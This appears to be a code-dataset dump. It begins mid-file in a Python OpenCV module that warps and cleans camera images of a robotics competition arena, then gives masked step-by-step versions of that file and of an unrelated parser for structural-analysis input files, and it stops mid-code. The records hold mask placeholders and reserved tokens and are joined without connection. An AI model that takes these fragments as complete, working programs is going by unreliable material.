processed_arena = cv2.adaptiveThreshold(processed_arena, 255,
cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY_INV,
31, 5)
# Morphological Operations: to remove noise
kernel = np.ones((7, 7), np.uint8)
processed_arena = cv2.erode(processed_arena, kernel)
kernel = np.ones((5, 5), np.uint8)
processed_arena = cv2.dilate(processed_arena, kernel)
# Contour Detection
(contours, heirarchy) = cv2.findContours(processed_arena, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)
# Getting the contour of interest: inner edge and outer edge of the box- largest and second largest contour
contours = sorted(contours, key=cv2.contourArea, reverse=True)
the_outer_contour = contours[0]
the_inner_contour = contours[1]
# Approximating to get corners of the quadrilaterals
peri_in = cv2.arcLength(the_inner_contour, True)
peri_out = cv2.arcLength(the_outer_contour, True)
in_corners = cv2.approxPolyDP(the_inner_contour, .01 * peri_in, True)
out_corners = cv2.approxPolyDP(the_outer_contour, .01 * peri_out, True)
if len(in_corners) != 4 and len(out_corners) != 4:
return
# Define result dimensions (600 X 900) therefore each block 100 X 100
result_pts = np.float32([[0, 0], [0, 600], [900, 0], [900, 600]])
# Sort the detected corners to align with result corners
in_corners = in_corners[np.argsort(in_corners[:, 0, 0] + in_corners[:, 0, 1])]
out_corners = out_corners[np.argsort(out_corners[:, 0, 0] + out_corners[:, 0, 1])]
# corner blocks are less than 8 inches: block + center of border = 8in
corners = (in_corners + out_corners) / 2
source_pts = np.float32(corners)
# cv2.drawContours(frame, [corners], -1, (255, 0, 0), 2)
# cv2.imshow('Display'. frame)
# cv2.waitKey(0)
# For Debugging: cv2.drawContours(arena, corners, -1, (0, 0, 255), 5)
# Get transformation matrix
M = cv2.getPerspectiveTransform(source_pts, result_pts)
return M
"""
* Function Name: arena_preprocess
* Input: image - (raw camera feed of the arena)
* Output: processed_arena, warped_arena
* Logic: Multiple openCV tricks are used to make the raw camera feed
as close to ideal image as possible
Each process is explained in the function
* Example Call: arena_preprocess(frame, M)
"""
def arena_preprocess(frame, M):
# Remapping to final desired result image
processed_arena = cv2.warpPerspective(frame, M, (900, 600))
# Make the excess black border White: ~10px thick
in_corners = np.array([[10, 18], [10, 590], [890, 590], [890, 15]])
h, w = processed_arena.shape[:2]
result_mask = np.zeros((h, w), np.uint8)
mask = np.zeros((h + 2, w + 2), np.uint8)
cv2.drawContours(mask, [in_corners], -1, 255, 1)
cv2.floodFill(result_mask, mask, (0, 0), 255)
processed_arena = cv2.add(processed_arena, cv2.cvtColor(result_mask, cv2.COLOR_GRAY2BGR))
# cv2.imshow('Display', processed_arena)
# cv2.waitKey(0)
warped_arena = processed_arena.copy();
# Warped_arena: to be used for robot tracking
# Denoising: bilateral filter
processed_arena = cv2.bilateralFilter(processed_arena, 5, 99, 198)
# To Make Background White:
# 1) Invert
arena_inv = cv2.bitwise_not(processed_arena)
# 2) Subtract
processed_arena = cv2.subtract(arena_inv, processed_arena)
# 3) Invert
processed_arena = cv2.bitwise_not(processed_arena)
# # Color Enhancement: Does Not Help in color detection
# ycrcb = cv2.cvtColor(processed_arena, cv2.COLOR_BGR2YCR_CB)
# y, cr, cb = cv2.split(ycrcb)
# cv2.equalizeHist(y, y)
# ycrcb = cv2.merge((y, cr, cb))
# processed_arena = cv2.cvtColor(ycrcb, cv2.COLOR_YCR_CB2BGR)
#
# # Shadow Removal- Not Used since Removes Shape Detail
# shadow = cv2.cvtColor(processed_arena, cv2.COLOR_BGR2GRAY)
# ret, shadow = cv2.threshold(shadow, 10, 255, cv2.THRESH_BINARY_INV)
# shadow = cv2.cvtColor(shadow, cv2.COLOR_GRAY2BGR)
# processed_arena = cv2.add(processed_arena, shadow)
# cv2.imshow('Display', processed_arena)
# cv2.waitKey(0)
# Show Grid Lines
for y in range(0, 6):
for x in range(0, 9):
cv2.line(processed_arena, (x * 100, y * 100), (x * 100, (y + 1) * 100), (0, 0, 0), 1)
cv2.line(processed_arena, (0, y * 100), (900, y * 100), (0, 0, 0), 1)
# cv2.imshow('Display', processed_arena)
# cv2.waitKey(0)
# cv2.destroyAllWindows()
# processed_arena: to be used for Object Detection
return processed_arena, warped_arena
"""
* Function Name: get_robot_space
* Input: frame - (raw camera feed of the arena)
* Output: warped portion of arena
* Logic: Warps a portion of the arena to which the robot position
is mapped to avoid parallax
* Example Call: robot_space = get_robot_space(frame)
"""
def get_robot_space(frame):
# Denoising: bilateral filter Kernel size of 99 (Preferred Over medianBlur to maintain edge info)
frame = cv2.bilateralFilter(frame, 5, 99, 198)
# Define result dimensions (600 X 900) therefore each block 100 X 100
source_pts = np.float32([[24, 56], [27, 444], [608, 47], [615, 437]]) #(576, 65) # 53,71 (53, 400) (586, 390)
# Define result dimensions (600 X 900) therefore each block 100 X 100
result_pts = np.float32([[0, 0], [0, 600], [900, 0], [900, 600]])
# Get transformation matrix
M = cv2.getPerspectiveTransform(source_pts, result_pts)
# Remapping to final desired result image
warped_arena = cv2.warpPerspective(frame, M, (900, 600))
# Show Grid Lines
for y in range(0, 6):
for x in range(0, 9):
cv2.line(warped_arena, (x * 100, y * 100), (x * 100, (y + 1) * 100), (0, 0, 0), 1)
cv2.line(warped_arena, (0, y * 100), (900, y * 100), (0, 0, 0), 1)
return warped_arena
|
flexible
|
{
"blob_id": "228852f960e9343d9f45abdd3204cfab7bb54bc6",
"index": 8230,
"step-1": "<mask token>\n\n\ndef arena_preprocess(frame, M):\n processed_arena = cv2.warpPerspective(frame, M, (900, 600))\n in_corners = np.array([[10, 18], [10, 590], [890, 590], [890, 15]])\n h, w = processed_arena.shape[:2]\n result_mask = np.zeros((h, w), np.uint8)\n mask = np.zeros((h + 2, w + 2), np.uint8)\n cv2.drawContours(mask, [in_corners], -1, 255, 1)\n cv2.floodFill(result_mask, mask, (0, 0), 255)\n processed_arena = cv2.add(processed_arena, cv2.cvtColor(result_mask,\n cv2.COLOR_GRAY2BGR))\n warped_arena = processed_arena.copy()\n processed_arena = cv2.bilateralFilter(processed_arena, 5, 99, 198)\n arena_inv = cv2.bitwise_not(processed_arena)\n processed_arena = cv2.subtract(arena_inv, processed_arena)\n processed_arena = cv2.bitwise_not(processed_arena)\n for y in range(0, 6):\n for x in range(0, 9):\n cv2.line(processed_arena, (x * 100, y * 100), (x * 100, (y + 1) *\n 100), (0, 0, 0), 1)\n cv2.line(processed_arena, (0, y * 100), (900, y * 100), (0, 0, 0), 1)\n return processed_arena, warped_arena\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef getTransformationMatrix(frame):\n processed_arena = cv2.bilateralFilter(frame, 5, 99, 198)\n processed_arena = cv2.cvtColor(processed_arena, cv2.COLOR_BGR2GRAY)\n processed_arena = cv2.equalizeHist(processed_arena)\n processed_arena = cv2.adaptiveThreshold(processed_arena, 255, cv2.\n ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY_INV, 31, 5)\n kernel = np.ones((7, 7), np.uint8)\n processed_arena = cv2.erode(processed_arena, kernel)\n kernel = np.ones((5, 5), np.uint8)\n processed_arena = cv2.dilate(processed_arena, kernel)\n contours, heirarchy = cv2.findContours(processed_arena, cv2.RETR_LIST,\n cv2.CHAIN_APPROX_SIMPLE)\n contours = sorted(contours, key=cv2.contourArea, reverse=True)\n the_outer_contour = contours[0]\n the_inner_contour = contours[1]\n peri_in = cv2.arcLength(the_inner_contour, True)\n peri_out = cv2.arcLength(the_outer_contour, True)\n in_corners = cv2.approxPolyDP(the_inner_contour, 0.01 * peri_in, True)\n out_corners = cv2.approxPolyDP(the_outer_contour, 0.01 * peri_out, True)\n if len(in_corners) != 4 and len(out_corners) != 4:\n return\n result_pts = np.float32([[0, 0], [0, 600], [900, 0], [900, 600]])\n in_corners = in_corners[np.argsort(in_corners[:, 0, 0] + in_corners[:, \n 0, 1])]\n out_corners = out_corners[np.argsort(out_corners[:, 0, 0] + out_corners\n [:, 0, 1])]\n corners = (in_corners + out_corners) / 2\n source_pts = np.float32(corners)\n M = cv2.getPerspectiveTransform(source_pts, result_pts)\n return M\n\n\n<mask token>\n\n\ndef arena_preprocess(frame, M):\n processed_arena = cv2.warpPerspective(frame, M, (900, 600))\n in_corners = np.array([[10, 18], [10, 590], [890, 590], [890, 15]])\n h, w = processed_arena.shape[:2]\n result_mask = np.zeros((h, w), np.uint8)\n mask = np.zeros((h + 2, w + 2), np.uint8)\n cv2.drawContours(mask, [in_corners], -1, 255, 1)\n cv2.floodFill(result_mask, mask, (0, 0), 255)\n processed_arena = cv2.add(processed_arena, cv2.cvtColor(result_mask,\n cv2.COLOR_GRAY2BGR))\n warped_arena = processed_arena.copy()\n processed_arena = cv2.bilateralFilter(processed_arena, 5, 99, 198)\n arena_inv = cv2.bitwise_not(processed_arena)\n processed_arena = cv2.subtract(arena_inv, processed_arena)\n processed_arena = cv2.bitwise_not(processed_arena)\n for y in range(0, 6):\n for x in range(0, 9):\n cv2.line(processed_arena, (x * 100, y * 100), (x * 100, (y + 1) *\n 100), (0, 0, 0), 1)\n cv2.line(processed_arena, (0, y * 100), (900, y * 100), (0, 0, 0), 1)\n return processed_arena, warped_arena\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef getTransformationMatrix(frame):\n processed_arena = cv2.bilateralFilter(frame, 5, 99, 198)\n processed_arena = cv2.cvtColor(processed_arena, cv2.COLOR_BGR2GRAY)\n processed_arena = cv2.equalizeHist(processed_arena)\n processed_arena = cv2.adaptiveThreshold(processed_arena, 255, cv2.\n ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY_INV, 31, 5)\n kernel = np.ones((7, 7), np.uint8)\n processed_arena = cv2.erode(processed_arena, kernel)\n kernel = np.ones((5, 5), np.uint8)\n processed_arena = cv2.dilate(processed_arena, kernel)\n contours, heirarchy = cv2.findContours(processed_arena, cv2.RETR_LIST,\n cv2.CHAIN_APPROX_SIMPLE)\n contours = sorted(contours, key=cv2.contourArea, reverse=True)\n the_outer_contour = contours[0]\n the_inner_contour = contours[1]\n peri_in = cv2.arcLength(the_inner_contour, True)\n peri_out = cv2.arcLength(the_outer_contour, True)\n in_corners = cv2.approxPolyDP(the_inner_contour, 0.01 * peri_in, True)\n out_corners = cv2.approxPolyDP(the_outer_contour, 0.01 * peri_out, True)\n if len(in_corners) != 4 and len(out_corners) != 4:\n return\n result_pts = np.float32([[0, 0], [0, 600], [900, 0], [900, 600]])\n in_corners = in_corners[np.argsort(in_corners[:, 0, 0] + in_corners[:, \n 0, 1])]\n out_corners = out_corners[np.argsort(out_corners[:, 0, 0] + out_corners\n [:, 0, 1])]\n corners = (in_corners + out_corners) / 2\n source_pts = np.float32(corners)\n M = cv2.getPerspectiveTransform(source_pts, result_pts)\n return M\n\n\n<mask token>\n\n\ndef arena_preprocess(frame, M):\n processed_arena = cv2.warpPerspective(frame, M, (900, 600))\n in_corners = np.array([[10, 18], [10, 590], [890, 590], [890, 15]])\n h, w = processed_arena.shape[:2]\n result_mask = np.zeros((h, w), np.uint8)\n mask = np.zeros((h + 2, w + 2), np.uint8)\n cv2.drawContours(mask, [in_corners], -1, 255, 1)\n cv2.floodFill(result_mask, mask, (0, 0), 255)\n processed_arena = cv2.add(processed_arena, cv2.cvtColor(result_mask,\n cv2.COLOR_GRAY2BGR))\n warped_arena = processed_arena.copy()\n processed_arena = cv2.bilateralFilter(processed_arena, 5, 99, 198)\n arena_inv = cv2.bitwise_not(processed_arena)\n processed_arena = cv2.subtract(arena_inv, processed_arena)\n processed_arena = cv2.bitwise_not(processed_arena)\n for y in range(0, 6):\n for x in range(0, 9):\n cv2.line(processed_arena, (x * 100, y * 100), (x * 100, (y + 1) *\n 100), (0, 0, 0), 1)\n cv2.line(processed_arena, (0, y * 100), (900, y * 100), (0, 0, 0), 1)\n return processed_arena, warped_arena\n\n\n<mask token>\n\n\ndef get_robot_space(frame):\n frame = cv2.bilateralFilter(frame, 5, 99, 198)\n source_pts = np.float32([[24, 56], [27, 444], [608, 47], [615, 437]])\n result_pts = np.float32([[0, 0], [0, 600], [900, 0], [900, 600]])\n M = cv2.getPerspectiveTransform(source_pts, result_pts)\n warped_arena = cv2.warpPerspective(frame, M, (900, 600))\n for y in range(0, 6):\n for x in range(0, 9):\n cv2.line(warped_arena, (x * 100, y * 100), (x * 100, (y + 1) * \n 100), (0, 0, 0), 1)\n cv2.line(warped_arena, (0, y * 100), (900, y * 100), (0, 0, 0), 1)\n return warped_arena\n",
"step-4": "<mask token>\nimport cv2\nimport numpy as np\n<mask token>\n\n\ndef getTransformationMatrix(frame):\n processed_arena = cv2.bilateralFilter(frame, 5, 99, 198)\n processed_arena = cv2.cvtColor(processed_arena, cv2.COLOR_BGR2GRAY)\n processed_arena = cv2.equalizeHist(processed_arena)\n processed_arena = cv2.adaptiveThreshold(processed_arena, 255, cv2.\n ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY_INV, 31, 5)\n kernel = np.ones((7, 7), np.uint8)\n processed_arena = cv2.erode(processed_arena, kernel)\n kernel = np.ones((5, 5), np.uint8)\n processed_arena = cv2.dilate(processed_arena, kernel)\n contours, heirarchy = cv2.findContours(processed_arena, cv2.RETR_LIST,\n cv2.CHAIN_APPROX_SIMPLE)\n contours = sorted(contours, key=cv2.contourArea, reverse=True)\n the_outer_contour = contours[0]\n the_inner_contour = contours[1]\n peri_in = cv2.arcLength(the_inner_contour, True)\n peri_out = cv2.arcLength(the_outer_contour, True)\n in_corners = cv2.approxPolyDP(the_inner_contour, 0.01 * peri_in, True)\n out_corners = cv2.approxPolyDP(the_outer_contour, 0.01 * peri_out, True)\n if len(in_corners) != 4 and len(out_corners) != 4:\n return\n result_pts = np.float32([[0, 0], [0, 600], [900, 0], [900, 600]])\n in_corners = in_corners[np.argsort(in_corners[:, 0, 0] + in_corners[:, \n 0, 1])]\n out_corners = out_corners[np.argsort(out_corners[:, 0, 0] + out_corners\n [:, 0, 1])]\n corners = (in_corners + out_corners) / 2\n source_pts = np.float32(corners)\n M = cv2.getPerspectiveTransform(source_pts, result_pts)\n return M\n\n\n<mask token>\n\n\ndef arena_preprocess(frame, M):\n processed_arena = cv2.warpPerspective(frame, M, (900, 600))\n in_corners = np.array([[10, 18], [10, 590], [890, 590], [890, 15]])\n h, w = processed_arena.shape[:2]\n result_mask = np.zeros((h, w), np.uint8)\n mask = np.zeros((h + 2, w + 2), np.uint8)\n cv2.drawContours(mask, [in_corners], -1, 255, 1)\n cv2.floodFill(result_mask, mask, (0, 0), 255)\n processed_arena = cv2.add(processed_arena, cv2.cvtColor(result_mask,\n cv2.COLOR_GRAY2BGR))\n warped_arena = processed_arena.copy()\n processed_arena = cv2.bilateralFilter(processed_arena, 5, 99, 198)\n arena_inv = cv2.bitwise_not(processed_arena)\n processed_arena = cv2.subtract(arena_inv, processed_arena)\n processed_arena = cv2.bitwise_not(processed_arena)\n for y in range(0, 6):\n for x in range(0, 9):\n cv2.line(processed_arena, (x * 100, y * 100), (x * 100, (y + 1) *\n 100), (0, 0, 0), 1)\n cv2.line(processed_arena, (0, y * 100), (900, y * 100), (0, 0, 0), 1)\n return processed_arena, warped_arena\n\n\n<mask token>\n\n\ndef get_robot_space(frame):\n frame = cv2.bilateralFilter(frame, 5, 99, 198)\n source_pts = np.float32([[24, 56], [27, 444], [608, 47], [615, 437]])\n result_pts = np.float32([[0, 0], [0, 600], [900, 0], [900, 600]])\n M = cv2.getPerspectiveTransform(source_pts, result_pts)\n warped_arena = cv2.warpPerspective(frame, M, (900, 600))\n for y in range(0, 6):\n for x in range(0, 9):\n cv2.line(warped_arena, (x * 100, y * 100), (x * 100, (y + 1) * \n 100), (0, 0, 0), 1)\n cv2.line(warped_arena, (0, y * 100), (900, y * 100), (0, 0, 0), 1)\n return warped_arena\n",
"step-5": "\"\"\"\n* Team Id : LM#4787\n* Author List : Arjun S, Vinod, Arvind, Vishnu\n* Filename: ArenaPreprocessor.py\n* Theme: Launch A Module\n* Functions: arena_preprocess, getTransformationMatrix, get_robot_space\n* Global Variables: None\n\"\"\"\n\nimport cv2\nimport numpy as np\n\n\n\"\"\"\n* Function Name: getTransformationMatrix\n* Input: frame - (raw camera feed of the arena)\n* Output: perspective transformation matrix\n* Logic: Uses image processing techniques and finds contours for outer border to\n get transformation matrix\n Each process is explained in the function\n* Example Call: M = getTransformationMatrix(frame)\n\"\"\"\n\ndef getTransformationMatrix(frame):\n # # flips Horizontally and Vertically: Depends on Camera Setup\n # arena = cv2.flip(frame, -1)\n\n # Denoising: bilateral filter Kernel size of 99 (Preferred Over medianBlur to maintain edge info)\n processed_arena = cv2.bilateralFilter(frame, 5, 99, 198)\n\n # To Grayscale\n processed_arena = cv2.cvtColor(processed_arena, cv2.COLOR_BGR2GRAY)\n\n # Increase Contrast: for better border detection\n processed_arena = cv2.equalizeHist(processed_arena)\n\n # Adaptive Threshold to get black thick boundary: (Used over Threshold: for lighting consideration1)\n processed_arena = cv2.adaptiveThreshold(processed_arena, 255,\n cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY_INV,\n 31, 5)\n\n # Morphological Operations: to remove noise\n kernel = np.ones((7, 7), np.uint8)\n processed_arena = cv2.erode(processed_arena, kernel)\n\n kernel = np.ones((5, 5), np.uint8)\n processed_arena = cv2.dilate(processed_arena, kernel)\n\n # Contour Detection\n (contours, heirarchy) = cv2.findContours(processed_arena, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)\n\n # Getting the contour of interest: inner edge and outer edge of the box- largest and second largest contour\n contours = sorted(contours, key=cv2.contourArea, reverse=True)\n the_outer_contour = contours[0]\n the_inner_contour = contours[1]\n\n # Approximating to get corners of the quadrilaterals\n peri_in = cv2.arcLength(the_inner_contour, True)\n peri_out = cv2.arcLength(the_outer_contour, True)\n in_corners = cv2.approxPolyDP(the_inner_contour, .01 * peri_in, True)\n out_corners = cv2.approxPolyDP(the_outer_contour, .01 * peri_out, True)\n if len(in_corners) != 4 and len(out_corners) != 4:\n return\n\n # Define result dimensions (600 X 900) therefore each block 100 X 100\n result_pts = np.float32([[0, 0], [0, 600], [900, 0], [900, 600]])\n\n # Sort the detected corners to align with result corners\n in_corners = in_corners[np.argsort(in_corners[:, 0, 0] + in_corners[:, 0, 1])]\n out_corners = out_corners[np.argsort(out_corners[:, 0, 0] + out_corners[:, 0, 1])]\n\n # corner blocks are less than 8 inches: block + center of border = 8in\n corners = (in_corners + out_corners) / 2\n source_pts = np.float32(corners)\n\n # cv2.drawContours(frame, [corners], -1, (255, 0, 0), 2)\n # cv2.imshow('Display'. frame)\n # cv2.waitKey(0)\n # For Debugging: cv2.drawContours(arena, corners, -1, (0, 0, 255), 5)\n\n # Get transformation matrix\n M = cv2.getPerspectiveTransform(source_pts, result_pts)\n\n return M\n\n\n\"\"\"\n* Function Name: arena_preprocess\n* Input: image - (raw camera feed of the arena)\n* Output: processed_arena, warped_arena\n* Logic: Multiple openCV tricks are used to make the raw camera feed\n as close to ideal image as possible\n Each process is explained in the function\n* Example Call: arena_preprocess(frame, M)\n\"\"\"\n\ndef arena_preprocess(frame, M):\n # Remapping to final desired result image\n processed_arena = cv2.warpPerspective(frame, M, (900, 600))\n\n # Make the excess black border White: ~10px thick\n in_corners = np.array([[10, 18], [10, 590], [890, 590], [890, 15]])\n h, w = processed_arena.shape[:2]\n result_mask = np.zeros((h, w), np.uint8)\n mask = np.zeros((h + 2, w + 2), np.uint8)\n cv2.drawContours(mask, [in_corners], -1, 255, 1)\n cv2.floodFill(result_mask, mask, (0, 0), 255)\n processed_arena = cv2.add(processed_arena, cv2.cvtColor(result_mask, cv2.COLOR_GRAY2BGR))\n\n # cv2.imshow('Display', processed_arena)\n # cv2.waitKey(0)\n warped_arena = processed_arena.copy();\n # Warped_arena: to be used for robot tracking\n # Denoising: bilateral filter\n processed_arena = cv2.bilateralFilter(processed_arena, 5, 99, 198)\n\n # To Make Background White:\n # 1) Invert\n arena_inv = cv2.bitwise_not(processed_arena)\n # 2) Subtract\n processed_arena = cv2.subtract(arena_inv, processed_arena)\n # 3) Invert\n processed_arena = cv2.bitwise_not(processed_arena)\n\n # # Color Enhancement: Does Not Help in color detection\n # ycrcb = cv2.cvtColor(processed_arena, cv2.COLOR_BGR2YCR_CB)\n # y, cr, cb = cv2.split(ycrcb)\n # cv2.equalizeHist(y, y)\n # ycrcb = cv2.merge((y, cr, cb))\n # processed_arena = cv2.cvtColor(ycrcb, cv2.COLOR_YCR_CB2BGR)\n #\n # # Shadow Removal- Not Used since Removes Shape Detail\n # shadow = cv2.cvtColor(processed_arena, cv2.COLOR_BGR2GRAY)\n # ret, shadow = cv2.threshold(shadow, 10, 255, cv2.THRESH_BINARY_INV)\n # shadow = cv2.cvtColor(shadow, cv2.COLOR_GRAY2BGR)\n # processed_arena = cv2.add(processed_arena, shadow)\n\n # cv2.imshow('Display', processed_arena)\n # cv2.waitKey(0)\n\n # Show Grid Lines\n for y in range(0, 6):\n for x in range(0, 9):\n cv2.line(processed_arena, (x * 100, y * 100), (x * 100, (y + 1) * 100), (0, 0, 0), 1)\n cv2.line(processed_arena, (0, y * 100), (900, y * 100), (0, 0, 0), 1)\n # cv2.imshow('Display', processed_arena)\n # cv2.waitKey(0)\n # cv2.destroyAllWindows()\n\n # processed_arena: to be used for Object Detection\n return processed_arena, warped_arena\n\n\n\"\"\"\n* Function Name: get_robot_space\n* Input: frame - (raw camera feed of the arena)\n* Output: warped portion of arena\n* Logic: Warps a portion of the arena to which the robot position\n is mapped to avoid parallax\n* Example Call: robot_space = get_robot_space(frame)\n\"\"\"\n\n\ndef get_robot_space(frame):\n # Denoising: bilateral filter Kernel size of 99 (Preferred Over medianBlur to maintain edge info)\n frame = cv2.bilateralFilter(frame, 5, 99, 198)\n\n # Define result dimensions (600 X 900) therefore each block 100 X 100\n source_pts = np.float32([[24, 56], [27, 444], [608, 47], [615, 437]]) #(576, 65) # 53,71 (53, 400) (586, 390)\n\n # Define result dimensions (600 X 900) therefore each block 100 X 100\n result_pts = np.float32([[0, 0], [0, 600], [900, 0], [900, 600]])\n\n # Get transformation matrix\n M = cv2.getPerspectiveTransform(source_pts, result_pts)\n\n # Remapping to final desired result image\n warped_arena = cv2.warpPerspective(frame, M, (900, 600))\n\n # Show Grid Lines\n for y in range(0, 6):\n for x in range(0, 9):\n cv2.line(warped_arena, (x * 100, y * 100), (x * 100, (y + 1) * 100), (0, 0, 0), 1)\n cv2.line(warped_arena, (0, y * 100), (900, y * 100), (0, 0, 0), 1)\n\n return warped_arena\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Reader:
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Reader:
def read(self, filePath):
"""
Reads text file with nodes and returns the result dict with all objects
and their nested properties
"""
result = {'coordinates': {'count': 0, 'nodes': []},
'element_groups': {'number_of_elements': 0, 'count': 0,
'groups': []}, 'bars': [], 'materials': {'count': 0,
'materials': []}, 'geometric_properties': {'count': 0},
'bcnodes': {'count': 0}, 'loads': {'count': 0}}
with open(filePath, 'r') as f:
lines = f.readlines()
elementCounter = 0
groupCounter = 0
geometricCounter = 0
for line in lines:
line = line.strip()
el = line.split(' ')
if len(line) == 0:
continue
if len(line) != 0 and line[0] == '*':
section = line[1:].lower()
continue
if section == 'coordinates':
if len(el) == 1:
result[section]['count'] = el[0]
else:
result[section]['nodes'].append(Node(int(el[0]),
float(el[1]), float(el[2])))
elif section == 'element_groups':
if len(line) == 1:
result[section]['count'] = int(el[0])
else:
result[section]['groups'].append(Group(el[0], el[1],
el[2]))
result[section]['number_of_elements'] += int(el[1])
elif section == 'incidences':
groups = result['element_groups']['groups']
nodes = result['coordinates']['nodes']
print(el)
currentGroup = groups[groupCounter]
if currentGroup.amount == 0:
groupCounter += 1
currentGroup = groups[groupCounter]
print('Group n: {} count: {}'.format(currentGroup.n,
currentGroup.amount))
bar = Bar(el[0], nodes[int(el[1]) - 1], nodes[int(el[2]
) - 1], groups[groupCounter])
print(
"""
Bar {} created
Start node: {} End Node: {} Group: {}
"""
.format(bar.id, bar.startNode.n, bar.endNode.n, bar
.group))
result['bars'].append(bar)
currentGroup.amount -= 1
elif section == 'materials':
if len(el) == 1:
result[section]['count'] = el[0]
groupCounter = 0
else:
material = Material(el[0], el[1], el[2])
result[section]['materials'].append(material)
result['element_groups']['groups'][groupCounter
].setMaterial(material)
groupCounter += 1
elif section == 'geometric_properties':
if geometricCounter == 0:
result[section]['count'] = el[0]
else:
result['element_groups']['groups'][geometricCounter - 1
].setSectionArea(el[0])
geometricCounter += 1
elif section == 'bcnodes':
if len(el) == 1:
result[section]['count'] = el[0]
else:
nodeIndex = next((e for e, item in enumerate(result
['coordinates']['nodes']) if item.n == int(el[0
])), None)
result['coordinates']['nodes'][nodeIndex
].setRestriction(int(el[1]))
elif section == 'loads':
if len(el) == 1:
result[section]['count'] = el[0]
else:
load = Load(el[1], el[2])
nodeIndex = next((e for e, item in enumerate(result
['coordinates']['nodes']) if item.n == int(el[0
])), None)
result['coordinates']['nodes'][nodeIndex].addLoad(load)
for bar in result['bars']:
bar.createLocalArray()
print('---------- Parsing complete! ----------')
pprint(result)
print('---------------------------------------')
return result
<|reserved_special_token_1|>
from elements import Node, Bar, Material, Group, Load
from pprint import pprint
class Reader:
def read(self, filePath):
"""
Reads text file with nodes and returns the result dict with all objects
and their nested properties
"""
result = {'coordinates': {'count': 0, 'nodes': []},
'element_groups': {'number_of_elements': 0, 'count': 0,
'groups': []}, 'bars': [], 'materials': {'count': 0,
'materials': []}, 'geometric_properties': {'count': 0},
'bcnodes': {'count': 0}, 'loads': {'count': 0}}
with open(filePath, 'r') as f:
lines = f.readlines()
elementCounter = 0
groupCounter = 0
geometricCounter = 0
for line in lines:
line = line.strip()
el = line.split(' ')
if len(line) == 0:
continue
if len(line) != 0 and line[0] == '*':
section = line[1:].lower()
continue
if section == 'coordinates':
if len(el) == 1:
result[section]['count'] = el[0]
else:
result[section]['nodes'].append(Node(int(el[0]),
float(el[1]), float(el[2])))
elif section == 'element_groups':
if len(line) == 1:
result[section]['count'] = int(el[0])
else:
result[section]['groups'].append(Group(el[0], el[1],
el[2]))
result[section]['number_of_elements'] += int(el[1])
elif section == 'incidences':
groups = result['element_groups']['groups']
nodes = result['coordinates']['nodes']
print(el)
currentGroup = groups[groupCounter]
if currentGroup.amount == 0:
groupCounter += 1
currentGroup = groups[groupCounter]
print('Group n: {} count: {}'.format(currentGroup.n,
currentGroup.amount))
bar = Bar(el[0], nodes[int(el[1]) - 1], nodes[int(el[2]
) - 1], groups[groupCounter])
print(
"""
Bar {} created
Start node: {} End Node: {} Group: {}
"""
.format(bar.id, bar.startNode.n, bar.endNode.n, bar
.group))
result['bars'].append(bar)
currentGroup.amount -= 1
elif section == 'materials':
if len(el) == 1:
result[section]['count'] = el[0]
groupCounter = 0
else:
material = Material(el[0], el[1], el[2])
result[section]['materials'].append(material)
result['element_groups']['groups'][groupCounter
].setMaterial(material)
groupCounter += 1
elif section == 'geometric_properties':
if geometricCounter == 0:
result[section]['count'] = el[0]
else:
result['element_groups']['groups'][geometricCounter - 1
].setSectionArea(el[0])
geometricCounter += 1
elif section == 'bcnodes':
if len(el) == 1:
result[section]['count'] = el[0]
else:
nodeIndex = next((e for e, item in enumerate(result
['coordinates']['nodes']) if item.n == int(el[0
])), None)
result['coordinates']['nodes'][nodeIndex
].setRestriction(int(el[1]))
elif section == 'loads':
if len(el) == 1:
result[section]['count'] = el[0]
else:
load = Load(el[1], el[2])
nodeIndex = next((e for e, item in enumerate(result
['coordinates']['nodes']) if item.n == int(el[0
])), None)
result['coordinates']['nodes'][nodeIndex].addLoad(load)
for bar in result['bars']:
bar.createLocalArray()
print('---------- Parsing complete! ----------')
pprint(result)
print('---------------------------------------')
return result
<|reserved_special_token_1|>
from elements import Node, Bar, Material, Group, Load
from pprint import pprint
# query
# next((e for e in result['coordinates']['nodes'] if e.n == int(el[0])), None)
class Reader():
def read(self, filePath):
"""
Reads text file with nodes and returns the result dict with all objects
and their nested properties
"""
result = {
'coordinates': {
'count': 0,
'nodes': []
},
'element_groups': {
'number_of_elements': 0,
'count': 0,
'groups': []
},
'bars': [],
'materials': {
'count': 0,
'materials': []
},
'geometric_properties': {
'count': 0
},
'bcnodes': {
'count': 0
},
'loads': {
'count': 0
}
}
# print(result['coordinates']['nodes'])
with open(filePath,'r') as f:
lines = f.readlines()
elementCounter = 0
groupCounter = 0
geometricCounter = 0
for line in lines:
line = line.strip()
el = line.split(' ')
if len(line) == 0:
continue
if len(line) != 0 and line[0] == "*":
section = line[1:].lower()
continue
if section == 'coordinates':
if len(el) == 1 :
result[section]['count'] = el[0]
else:
result[section]['nodes'].append(Node(int(el[0]), float(el[1]), float(el[2])))
elif section == 'element_groups':
if len(line) == 1:
result[section]['count'] = int(el[0])
else:
result[section]['groups'].append(Group(el[0], el[1], el[2]))
result[section]['number_of_elements'] += int(el[1])
elif section == 'incidences':
groups = result['element_groups']['groups']
nodes = result['coordinates']['nodes']
print(el)
currentGroup = groups[groupCounter]
if (currentGroup.amount == 0):
groupCounter += 1
currentGroup = groups[groupCounter]
print("Group n: {} count: {}".format(currentGroup.n, currentGroup.amount))
bar = Bar(el[0], nodes[int(el[1])-1], nodes[int(el[2])-1], groups[groupCounter])
print(
"""
Bar {} created
Start node: {} End Node: {} Group: {}
""".format(bar.id, bar.startNode.n, bar.endNode.n, bar.group))
result['bars'].append(bar)
currentGroup.amount -= 1
elif section == 'materials':
if len(el) == 1:
result[section]['count'] = el[0]
groupCounter = 0
else:
material = Material(el[0], el[1], el[2])
